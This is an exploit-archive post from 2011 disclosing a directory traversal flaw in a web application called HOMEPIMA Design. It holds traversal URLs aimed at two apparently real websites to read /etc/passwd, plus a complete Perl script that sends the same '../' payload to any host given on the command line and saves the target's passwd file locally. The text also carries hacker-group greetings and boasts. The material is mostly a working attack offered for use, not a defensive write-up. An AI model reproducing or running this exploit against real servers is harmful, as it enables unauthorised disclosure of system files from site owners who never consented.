Home / exploitsPDF  

HOMEPINA File Disclosure / Directory Traversal

Posted on 06 May 2011

HOMEPIMA Design <= Remote Information Disclosure Exploit
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://09EXPLOIT.COM / HTTP://0NTO.ME
--------------------------------------------------------
Þu metriisiiin önüüüüüüüü...
bir uzunnnnnn alannn...

http://www.youtube.com/watch?v=2OeCifsOusw
--------------------------------------------------------
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : HOMEPIMA Design
|~Price : N/A
|~Version : N/A
|~Software: http://www.homepiman.com/
|~Vulnerability Style : /etc/passwd Disclosure
|~Vulnerability Dir : /
|~Google Keyword : N/A
|[~]Date : "06.05.2011"
|[~]Tested on :
DEMOS
----------------------------------------------------------
filedown.php <= 'file' Functions Not Security

MANUAL DÝSCLOSUYRE ATTACKÝNG START.
---------------------------------------------------------

http://www.sac-materials.com/setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd
http://www.dvilink.net/setup/filedown.php?file=filedown.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/etc/passwd Disclosure Exploit.
=============== DISCLOSURE.PL =================================================

use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title HOMEPIMA Design <= Remote Information Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. 

";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ 
";
print "[+] usage2 : perl $0 localhost / 
";
}
print "
************************************************************************
";
print "* Plinka Design <= Remote (File Disclosure/LFI) Exploit              *
";
print "* Exploited By : KnocKout                                                  *
";
print "* Contact :   knockoutr[at]msn[dot]com                                 *
";
print "* --                                    *
";
print "*********************************************************************


";
($TargetIP, $path, $File,) = @ARGV;
$File="setup/filedown.php?file=../../../../../../../../../../../../../../etc/passwd";
my $url = "http://" . $TargetIP . $path . $File;
print "
 Az Bekle Sikertiyorum!!! 

";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "passwd.txt");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!

";
print "[+] OPERASYON TAMAM !
";
print "[+] etc/passwd Dosyasi Indirildi (passwd.txt)
";
print "[+] GRAYHATZ STAR 
";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....

";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !
[!] ".$request->status_line."
";
exit();
}


================================================================

.__        _____        _______
|  |__    /  |  |___  __   _  \_______   ____
|  |    /   |  |  /  /  /_  \_  __ \_/ __ \n|   Y  /    ^   />    <  \_/     | /  ___/
|___|  /\____   |/__/\_ \_____  /__|    \___  >
/      |__|      /      /            /
_____________________________
/   _____/\_   _____/\_   ___ \n\_____    |    __)_ /      /
/         |        \     \____
/_______  //_______  / \______  /
/         /         /
Was Here.                HTTP://H4X0RESEC.BLOGSOT.COM


# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....


# 1337day.com [2011-05-01]

 

TOP

Malware :

Exploits :